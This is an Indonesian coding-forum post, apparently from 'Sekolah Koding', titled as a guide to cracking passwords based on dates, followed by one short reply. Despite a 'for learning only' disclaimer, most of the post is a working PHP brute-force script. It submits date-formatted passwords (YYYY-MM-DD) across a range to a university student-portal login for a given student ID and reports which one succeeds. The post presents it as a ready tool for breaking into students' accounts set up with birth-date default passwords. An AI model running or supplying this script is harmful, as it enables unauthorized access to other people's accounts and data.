Daftar dan Belajar Sekarang!

Membobol password yang menggunakan tanggal

foto darkside
107 Kontribusi 53 Coto
3 tahun yang lalu
Artikel ini hanya untuk pembelajaran berdasarkan contoh kasus di tempat kuliah sy dulu yg menerapkan sistem informasi akademik dengan password default tanggal lahir siswa yg diberikan oleh pengajaran. Langkah 1 akses ke situs Langkah 2 Melihat source webnya dengan mengklik view source pada browser, hal ini dilakukan untuk mencari variabel username dan password. Sy menggunakan contoh view source pada halaman login sekolah koding biar simpel ja saat menulis ini. https://skspace.sgp1.digitaloceanspaces.com/forums/images/sss.jpg Ketika telah mengetahui variabelNya lanjut langkah 3 Langkah 3
<?php
function post($host,$query,$others='')
{
$path=explode('/',$host);
$host=$path[0];
unset($path[0]);
$path='/'.(implode('/',$path));
$post="POST $path HTTP/1.1\r\nHost: $host\r\nContent-type: application/x-www-form-urlencoded\r\n${others}User-Agent: Mozilla 4.0\r\nContent-length: ".strlen($query)."\r\nConnection: close\r\n\r\n$query";
$h=fsockopen($host,80);
fwrite($h,$post);
for($a=0,$r='';!$a;)
{
$b=fread($h,8192);
$r.=$b;
$a=(($b=='')?1:0);
}
fclose($h);
return $r;
}
?>
<HTML>
<HEAD>
<TITLE>: : PASSWORD TEST : :</TITLE>
</HEAD>
<BODY>
<?php
// Ganti tanggal awal dan akhir test password
$awal="25/5/1984";
$akhir="28/5/1984";
// Pecah menjadi tanggal, bulan dan tahun
$oarr=explode("/", $awal);
$tawal=$oarr[2];
$bawal=$oarr[1];
$hawal=$oarr[0];
$oarr=explode("/", $akhir);
$takhir=$oarr[2];
$bakhir=$oarr[1];
$hakhir=$oarr[0];
//Url data akan dikirim contoh : host/dir/file... >> test.com/contoh/coba.jsp
$urltarget="kampusgue.ac.id/ceceklog.php"; //klw pada gambar source code SK di atas sesuai dengan action fromNya yaitu
https://skspace.sgp1.digitaloceanspaces.com/forums/images/ssd.jpg
// Set variabel tgl text awal
$tgl="00/00/00";
// Test!!!
while($tgl!=$akhir)
{
$hf=(strlen($hawal)>1 ? $hawal : "0".$hawal);
$bf=(strlen($bawal)>1 ? $bawal : "0".$bawal);
$passtest=$tawal."-".$bf."-".$hf; // format passwordnya YYYY-MM-DD
$datatest=post($urltarget ,"user=123456&pass=".$passtest."&aksi=Login"); // Tampung headernya...
if(substr_count($datatest, "index_mhs.php")>0) // PASSWORD OK
{
echo "COBA PASSWORD : <B>".$passtest."</B> HASIL : <B>BERHASIL</B><BR>\n</BODY>\n</HTML>";
exit;
}else{ // BUKAN PASSWORD
echo "COBA PASSWORD : <B>".$passtest."</B> HASIL : <B>GAGAL</B><BR>\n";
}
$tgl=$hawal."/".$bawal."/".$tawal; // Biar ngga loop trus menerus
// matematika untuk tanggal
if($hawal>30)
{
if($bawal>11)
{
$tawal+=1;
$bawal=0;
}
$bawal+=1;
$hawal=0;
}
$hawal+=1;
}
?>
</BODY>
</HTML>
Done!! user 123456 adalah username/nim yg diberikan oleh pengajaran jg dan variabel $passtest adalah variabel yg kita isikan dengan password baru yg kita inginkan. :D Sekian dan terima kasih

Jawaban
foto Dank
3 Kontribusi 0 Coto
3 tahun yang lalu
itu perlu aplikasi tambahan?


Login untuk diksusi di forum sekolah koding